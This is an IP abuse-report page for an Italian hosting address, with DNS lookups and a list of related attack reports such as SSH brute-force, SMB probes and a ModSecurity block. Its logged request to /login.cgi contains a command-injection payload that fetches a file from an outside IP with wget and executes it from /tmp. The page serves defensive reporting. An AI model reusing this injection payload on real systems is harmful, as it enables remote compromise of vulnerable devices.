212.19.116.205

Basic Info

City: unknown

Region: unknown

Country: Italy

Internet Service Provider: Leonet srl

Hostname: unknown

Organization: Leonet srl

Usage Type: Data Center/Web Hosting/Transit

Comments:

Make a comment on this IP

Type	Details	Datetime
attack	Automatic report - SQL Injection Attempts	2019-07-02 05:54:28
attackspambots	212.19.116.205 - - [29/Jun/2019:10:28:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 166 "-" "ELEMENT/2.0" ...	2019-06-30 00:16:20

Type

Details

Datetime

attack

Automatic report - SQL Injection Attempts

2019-07-02 05:54:28

attackspambots

212.19.116.205 - - [29/Jun/2019:10:28:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 166 "-" "ELEMENT/2.0"
...

2019-06-30 00:16:20

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 212.19.116.205
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61323
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;212.19.116.205.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019062900 1800 900 604800 86400

;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Sun Jun 30 00:16:01 CST 2019
;; MSG SIZE  rcvd: 118

Host info

205.116.19.212.in-addr.arpa domain name pointer host205-pool116.leonet.it.

Nslookup info:

Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
205.116.19.212.in-addr.arpa	name = host205-pool116.leonet.it.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
106.9.171.246	attack	2020-01-09 22:52:53 dovecot_login authenticator failed for (ylyna) [106.9.171.246]:61265 I=[192.147.25.65]:25: 535 Incorrect authentication data (set_id=lilei@lerctr.org) 2020-01-09 22:53:01 dovecot_login authenticator failed for (lkwkj) [106.9.171.246]:61265 I=[192.147.25.65]:25: 535 Incorrect authentication data (set_id=lilei@lerctr.org) 2020-01-09 22:53:12 dovecot_login authenticator failed for (ugimv) [106.9.171.246]:61265 I=[192.147.25.65]:25: 535 Incorrect authentication data (set_id=lilei@lerctr.org) ...	2020-01-10 16:27:07
222.186.15.166	attack	Jan 10 03:22:47 plusreed sshd[24202]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.15.166 user=root Jan 10 03:22:50 plusreed sshd[24202]: Failed password for root from 222.186.15.166 port 22856 ssh2 ...	2020-01-10 16:31:19
177.125.20.110	attack	smtp probe/invalid login attempt	2020-01-10 16:06:13
111.93.60.155	attackbots	Unauthorized connection attempt from IP address 111.93.60.155 on Port 445(SMB)	2020-01-10 16:02:13
5.45.207.74	attackbots	[Fri Jan 10 11:53:56.357117 2020] [:error] [pid 1593:tid 140287783462656] [client 5.45.207.74:38868] [client 5.45.207.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/owasp-modsecurity-crs-3.2.0/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "696"] [id "920350"] [msg "Host header is a numeric IP address"] [data "103.27.207.197"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "103.27.207.197"] [uri "/"] [unique_id "XhgDZDqzHJP8htzLAy6DiQAAAG8"] ...	2020-01-10 16:03:52
113.189.189.179	attackbots	Jan 10 05:52:54 grey postfix/smtpd\[370\]: NOQUEUE: reject: RCPT from unknown\[113.189.189.179\]: 554 5.7.1 Service unavailable\; Client host \[113.189.189.179\] blocked using truncate.gbudb.net\; http://www.gbudb.com/truncate/ \[113.189.189.179\]\; from=\ to=\ proto=ESMTP helo=\ ...	2020-01-10 16:39:30
103.212.90.21	attackbotsspam	port scan and connect, tcp 8080 (http-proxy)	2020-01-10 16:01:18
5.135.176.206	attackspambots	ssh brute force	2020-01-10 16:21:46
118.172.127.69	attackbotsspam	Unauthorized connection attempt detected from IP address 118.172.127.69 to port 445	2020-01-10 15:58:40
203.147.79.174	attack	frenzy	2020-01-10 16:08:13
129.158.71.3	attack	Jan 10 07:08:41 legacy sshd[26900]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.158.71.3 Jan 10 07:08:44 legacy sshd[26900]: Failed password for invalid user lvv from 129.158.71.3 port 37081 ssh2 Jan 10 07:12:02 legacy sshd[27010]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.158.71.3 ...	2020-01-10 16:34:19
193.112.123.100	attack	Jan 10 05:53:34 hosting180 sshd[5875]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.112.123.100 user=root Jan 10 05:53:36 hosting180 sshd[5875]: Failed password for root from 193.112.123.100 port 52900 ssh2 ...	2020-01-10 16:13:57
14.248.214.91	attackbots	Jan 10 04:53:40 ms-srv sshd[61404]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.248.214.91 Jan 10 04:53:43 ms-srv sshd[61404]: Failed password for invalid user admin from 14.248.214.91 port 37869 ssh2	2020-01-10 16:10:58
79.118.207.71	attackbots	Automatic report - Port Scan Attack	2020-01-10 16:12:48
51.77.192.7	attack	Unauthorized connection attempt detected from IP address 51.77.192.7 to port 8545	2020-01-10 16:15:31

Recently Reported IPs

189.200.212.222	82.164.64.86	141.98.81.138	76.113.50.141
98.254.79.123	168.240.187.136	176.107.249.92	5.173.144.129
76.64.94.155	188.6.138.235	159.218.32.143	95.22.171.39
91.111.224.20	43.249.69.165	109.194.206.11	36.225.31.78
41.89.160.50	70.200.94.239	161.6.83.106	95.222.28.242